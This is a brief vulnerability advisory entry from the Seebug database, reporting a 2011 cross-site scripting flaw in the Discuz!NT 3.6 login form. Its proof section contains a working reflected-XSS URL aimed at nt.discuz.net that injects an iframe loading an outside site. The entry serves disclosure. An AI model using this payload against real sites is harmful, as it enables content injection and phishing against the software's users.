Discuz!NT 3.6跨站漏洞

2011-07-02T00:00:00
ID SSV:93688
Type seebug
Reporter Root
Modified 2011-07-02T00:00:00

Description

简要描述:

登陆框提交用户名或密码的时候存在跨站漏洞。

详细说明:

漏洞证明:

http://nt.discuz.net/login.aspx?postusername=%22%3E%3Ciframe%20src=%22http://www.zhu.cm%22%3E

<img src="https://images.seebug.org/upload/201107/020208417d0907b9cb1be71905ae1836e98e1e27.png" alt="" width="600" onerror="javascript:errimg(this);">